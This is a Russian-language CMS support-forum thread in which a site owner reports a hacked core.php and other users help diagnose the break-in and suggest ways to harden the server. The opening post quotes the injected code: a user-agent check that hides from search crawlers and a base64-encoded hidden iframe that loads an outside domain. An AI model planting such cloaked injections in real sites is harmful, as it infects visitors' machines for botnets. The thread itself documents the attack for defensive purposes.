На сайте вирус, взломан файл core.php!!!

legenda · 2012-10-21 05:42:58

Вопшем проблема началась с того что в вебмастере яндекса я заметил что он видит на одном моем сайте вирус.
Начал искать, все перелопатил нихера ненашел, потом случайно в коде в самом верху вижу такое

<iframe src="http://static-google.net/main/index.php" width="0" height="0" frameborder="0"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ua" lang="ua" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />

охренел откуда взялась эта <iframe src="http://static-google.net/main/index.php" width="0" height="0" frameborder="0"></iframe>
Но найти так и не смог. Начал ковырять дальше и заметил в файле core.php

такой вот кусок кода

//
// Global variables configuration arrays
//

$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Gigabot", "Ask", "Googlebot", "Yahoo");
if(!preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
echo (base64_decode('PGlmcmFtZSBzcmM9Imh0dHA6Ly9zdGF0aWMtZ29vZ2xlLm5ldC9tYWluL2luZGV4LnBocCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgZnJhbWVib3JkZXI9IjAiPjwvaWZyYW1lPg=='));

Походу на других сайтах у меня его нет. Удалил всю эту хрень вирус пропал.

Теперь вопрос, как эта хрень ко мне могла попась? почему на файле core.php небыло даты изменения? и самое главное зачем все это делалось? веть кроме яндека больше никто не маячил о вирусе.

---

Решил еще пару сайтов проверить, вопшем нашел этот кусок кода

$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Gigabot", "Ask", "Googlebot", "Yahoo");
if(!preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
echo (base64_decode('PGlmcmFtZSBzcmM9Imh0dHA6Ly9zdGF0aWMtZ29vZ2xlLm5ldC9tYWluL2luZGV4LnBocCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgZnJhbWVib3JkZXI9IjAiPjwvaWZyYW1lPg=='));

еще на 2 сайтах в разных файлах

таже фигня, никаких признаков что файл был изменен...

Изменено legenda (2012-10-21 13:15:01)

vitaly · 2012-10-21 14:59:10

Несколько раз сталкивался с такой ситуацией, оба раза причина была в краже паролей на FTP.
Хотя обычно код добавлялся в index.php

infinity237 · 2012-10-21 15:11:01

Дело даже не в краже паролей, а в вредоносном ПО (вирусах) на компах.

vitaly · 2012-10-21 15:21:41

infinity237, .... которое и ворует пароли из FTP клиентов

legenda · 2012-10-21 17:04:04

vitaly, infinity237, комп где стоит фтп сканировался уже на предмет вирусов касперским, да и постоянно он все мониторит, недумаю что есть вирусы, кроме меня фтп неукого не стоит, да еще прикол в том что на один фтп акаунт я за день до того поменял пароль, и после этого до момента когда увидел вирус его даже никуда ниразу не вводил, так что вероятность что пролез через фтрп практически нулевая, кроме того если б ктото украл пароль и дописал как обично в код в index.php, такое уже тоже было но там видно что поменялась дата создания файла, а у меня там даты 2011 годом даже) как так можно вности изменения в файл?

У меня вопрос, можно ли такое сделать с админки если есть права админа?
И вапше что этот вирус делает, так как зная мотив можно копать в сторону кому оно нужно, например делать досс атаку? или например могби ли такое сделал хостинг? если да то зачем ему это?

Изменено legenda (2012-10-21 17:10:43)

vip · 2012-10-21 17:18:11

legenda, некоторые хостинги возможно так делают особенно бесплатные возможно еще ftp клиент ломаный который ворует пароли

vitaly · 2012-10-21 18:18:32

legenda, операционная система даёт возможность изменять дату создания файла, тебе её могли восстановить.
Если точно не увели FTP аккаунт, то остаётся другой вариант - залили троян на сервер.

Мы на одной VPS'ке в течении недели вычищали изменения, которые нам заливали каждые сутки (!!!).
В итоге смогли найти источник - WP был пробит пол года назад (выяснили по бекапам - троян был залит действительно очень давно), а активно действовать начали существенно позже.

Если проблема повторится, то дело скорее всего не в FTP и есть 2 пути:
1. Полная перестановка системы (в случае с NG проще - скриптов меньше чем в WP и их содержимое достаточно внятно/понятно).
2. Анализ POST запросов, поиск "странных" файлов, сравнение контрольных сумм оригинальных файлов и тех, которые лежат на хостинге

legenda · 2012-10-25 05:52:55

vitaly, повторилось, + еще хуже, кроме тех сайтов что уже были заражены добавилось еще десяток сайтов,все зараженые сайты на двух акаунтах, на сервере есть еще акаунты но там сайты чистые, пока)
Вопшем сменил еще раз все пароли и проверил свой комп, посмотрим за пару дней.

legenda · 2012-10-25 15:06:01

vitaly, Напрягает один вопрос, если есть возможность както менять незаметно файлы то что ему стоит все вапше удалить

infinity237 · 2012-10-25 17:43:48

Должны мешать правильно выставленные chmod'ы.

vitaly · 2012-10-25 23:22:10

legenda, другие сайты на других виртуалках или на той же самой?
Если в других, то вариантов только 2:
1. продолжают уводить пароли
2. взломали хостера

Если виртуалка та же, то вариантов становится больше - могли "подбросить" троян какой-нить.

В такой ситуации часто спасает изменение владельцев всех php файлов на рута (кроме конфигов), после этого взломщики (если они тоже не под рутом ходят) уже ничего не смогут сделать.

vitaly, Напрягает один вопрос, если есть возможность както менять незаметно файлы то что ему стоит все вапше удалить

Зачем удалять? Бизнес-цель этого взлома - получение новых компов посетителей сайта в ботнет, которых (ботов) потом можно будет продать.
А если поудалять файлы, то сайт перестанет работать,.. где тут прибыль-то?

legenda · 2012-10-26 11:48:42

infinity237, правильно это как? на файлах которые были изменены стоят права 644

legenda · 2012-10-26 13:34:03

vitaly пишет:

legenda, другие сайты на других виртуалках или на той же самой?
Если в других, то вариантов только 2:
1. продолжают уводить пароли
2. взломали хостера
Если виртуалка та же, то вариантов становится больше - могли "подбросить" троян какой-нить.
В такой ситуации часто спасает изменение владельцев всех php файлов на рута (кроме конфигов), после этого взломщики (если они тоже не под рутом ходят) уже ничего не смогут сделать.

пока проблеммы только на одной виртуалке и только но ее 2 акаунтах, что впринципе говорит о том что скорее не уводят фтп пароли иначе почему на другие не увели

Зачем удалять? Бизнес-цель этого взлома - получение новых компов посетителей сайта в ботнет, которых (ботов) потом можно будет продать.
А если поудалять файлы, то сайт перестанет работать,.. где тут прибыль-то?

Ну у них бизнес в том чтоб подбросить вирус, у других может бизнес бить в другом, я говорю вапше, если так легко системные файлы меняются то о какой безопасности можно вапше говорить..

И кстате если уже закидывают код в файл core.php, варианта два, или изучили уже движок ng и знают куда закидывать так чтоб сайт не сламать, или это ктото из сообщества) или я не прав?

Изменено legenda (2012-10-26 13:35:06)

beliy · 2012-10-26 17:41:56

Если в других, то вариантов только 2:
1. продолжают уводить пароли
2. взломали хостера

есть еще 3 вариант - 1 раз увели пасс - залили web-shell, и работают уже через него - при этом становится до фени смена ftp паролей, паролей админа и прочее. При этом злоумышленники работают от имени пользователя apache и получить доступ к другим сайтам дело времени.

если так легко системные файлы меняются то о какой безопасности можно вапше говорить..

системные файлы не изменяются без прав root'a, если заметили что изменяются системные конфиги, то нужно ужесточить безопасность сервера. Пару базовых рекомендаций: меняем порт ssh, все пароли, запрещаем доступ к ssh пользователю root и работаем через su, доступ к ssh открываем только для конкретны IP (твоих естественно), ставим на сервер rkhunter и мониторим. Также не забиваем что воровать могут не только ftp, но и ssh - более тщательно проверяем свой комп на сюрпризы - наличия Касперского или любого другого АВ не гарантирует отсутствие вирусов. Будут вопросы спрашивай...

vitaly · 2012-10-27 00:11:27

Согласен с beliy, это наиболее реалистичный вариант (и с ним я, кстати, когда-то боролся).
Только один момент - шелл может быть не 1, а штук 10 и они будут раскиданы по разным местам системы.

Относительно файла core.php - во-первых, с английского это переводится как "ядро" и в итоге это наиболее интересное место для вставки вредоносного кода.
Во-вторых, даже минимальных знаний PHP достаточно для того, чтобы открыв index.php сразу же увидеть include на core.php
В-третьих, первым делом мы начнёшь искать троян именно в index.php, поэтому размещение его в другом файле увеличивает время его поиска и устранения.

infinity237 · 2012-10-27 00:18:52

Закрывайте тему, она никак не относится к NG.
https://www.google.ru/search?client=ope … 33&bih=531

Изменено infinity237 (2012-10-27 00:19:08)

Next Generation CMS :: Форум поддержки

Объявление

#1 2012-10-21 05:42:58

На сайте вирус, взломан файл core.php!!!

#2 2012-10-21 14:59:10

Re: На сайте вирус, взломан файл core.php!!!

#3 2012-10-21 15:11:01

Re: На сайте вирус, взломан файл core.php!!!

#4 2012-10-21 15:21:41

Re: На сайте вирус, взломан файл core.php!!!

#5 2012-10-21 17:04:04

Re: На сайте вирус, взломан файл core.php!!!

#6 2012-10-21 17:18:11

Re: На сайте вирус, взломан файл core.php!!!

#7 2012-10-21 18:18:32

Re: На сайте вирус, взломан файл core.php!!!

#8 2012-10-25 05:52:55

Re: На сайте вирус, взломан файл core.php!!!

#9 2012-10-25 15:06:01

Re: На сайте вирус, взломан файл core.php!!!

#10 2012-10-25 17:43:48

Re: На сайте вирус, взломан файл core.php!!!

#11 2012-10-25 23:22:10

Re: На сайте вирус, взломан файл core.php!!!

#12 2012-10-26 11:48:42

Re: На сайте вирус, взломан файл core.php!!!

#13 2012-10-26 13:34:03

Re: На сайте вирус, взломан файл core.php!!!

#14 2012-10-26 17:41:56

Re: На сайте вирус, взломан файл core.php!!!

#15 2012-10-27 00:11:27

Re: На сайте вирус, взломан файл core.php!!!

#16 2012-10-27 00:18:52

Re: На сайте вирус, взломан файл core.php!!!

Подвал раздела